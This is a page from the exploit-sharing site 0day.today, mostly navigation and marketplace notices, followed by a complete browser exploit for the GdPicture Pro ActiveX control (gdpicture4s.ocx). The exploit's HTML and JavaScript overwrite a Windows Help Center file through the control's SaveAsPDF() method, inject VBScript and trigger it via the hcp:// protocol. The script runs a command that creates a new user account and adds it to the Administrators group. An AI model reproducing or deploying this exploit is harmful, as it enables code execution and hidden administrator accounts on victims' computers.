0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
[=====================================================================
GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
=====================================================================
<!--
---------------------------------------------------------------------------------
GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution Exploit
---------------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.gdpicture.com/
ProgID...: GdPicture4S.Imaging
Description:
SaveAsPDF() method allow to create / overwrite file through
sFilePath argument. By using other arguments, such as sTitle,
an attacker could be inject html code and execute it using
the hcp:// protocol (tecnique discovered by rgod).
Also GdPicturePro5.Imaging is prone to this vulnerability,
but it doesn't implements the IObjectSafety interface.
Tested on Windows XP SP2 with IE 6/7
Object safety report:
Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
[*] A special thanks goes to shinnai, for his patience :)
-->
<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>
<script language='javascript'>
var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add";
var outFile = "c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";
var BMP = "\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e" +
"\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00" +
"\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00" +
"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00";
var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='wsh'><\/object>" +
"<script language='vbscript'>wsh.Run \"" + cmd + "\", SW_HIDE<\/script>";
test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the nag screen
test.CreateImageFromString(BMP);
if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href = "hcp://system/errors/badurl.htm";
</script>
# 0day.today [2024-11-14] #